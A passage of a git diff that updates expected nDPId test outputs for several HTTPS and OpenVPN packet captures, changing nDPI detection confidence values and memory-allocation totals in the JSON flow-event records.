+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","packets-captured":667,"packets-processed":667,"total-skipped-flows":0,"total-l4-payload-len":414073,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109496480} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 667/667 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5893756 bytes -~~ total memory freed........: 5893756 bytes -~~ total allocations/frees...: 118788/118788 +~~ total memory allocated....: 6027390 bytes +~~ total memory freed........: 6027390 bytes +~~ total allocations/frees...: 121550/121550 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 1170 chars diff --git a/test/results/443-git.pcap.out b/test/results/443-git.pcap.out index 353a5b89d..f5ee702da 100644 --- a/test/results/443-git.pcap.out +++ b/test/results/443-git.pcap.out 
@@ -4,10 +4,10 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"} 
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 
+00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","packets-captured":70,"packets-processed":70,"total-skipped-flows":0,"total-l4-payload-len":32585,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113658456} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 70/70 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879899 bytes -~~ total memory freed........: 5879899 bytes -~~ total allocations/frees...: 118192/118192 +~~ total memory allocated....: 6013533 bytes +~~ total memory freed........: 6013533 bytes +~~ total allocations/frees...: 120954/120954 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1212 chars diff --git a/test/results/443-opvn.pcap.out b/test/results/443-opvn.pcap.out index 75104c093..12419df9c 100644 --- a/test/results/443-opvn.pcap.out +++ b/test/results/443-opvn.pcap.out 
@@ -4,8 +4,8 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-payload-len":8517,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1581153184491} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 46/46 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872825 bytes -~~ total memory freed........: 5872825 bytes -~~ total allocations/frees...: 118161/118161 +~~ total memory allocated....: 6006459 bytes +~~ total memory freed........: 6006459 bytes +~~ total allocations/frees...: 120923/120923 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 689 chars diff --git a/test/results/443-safari.pcap.out b/test/results/443-safari.pcap.out index a0c43d4f8..4eceebd94 100644 
--- a/test/results/443-safari.pcap.out
+++ b/test/results/443-safari.pcap.out
@@ -4,10 +4,10 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"} 
-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
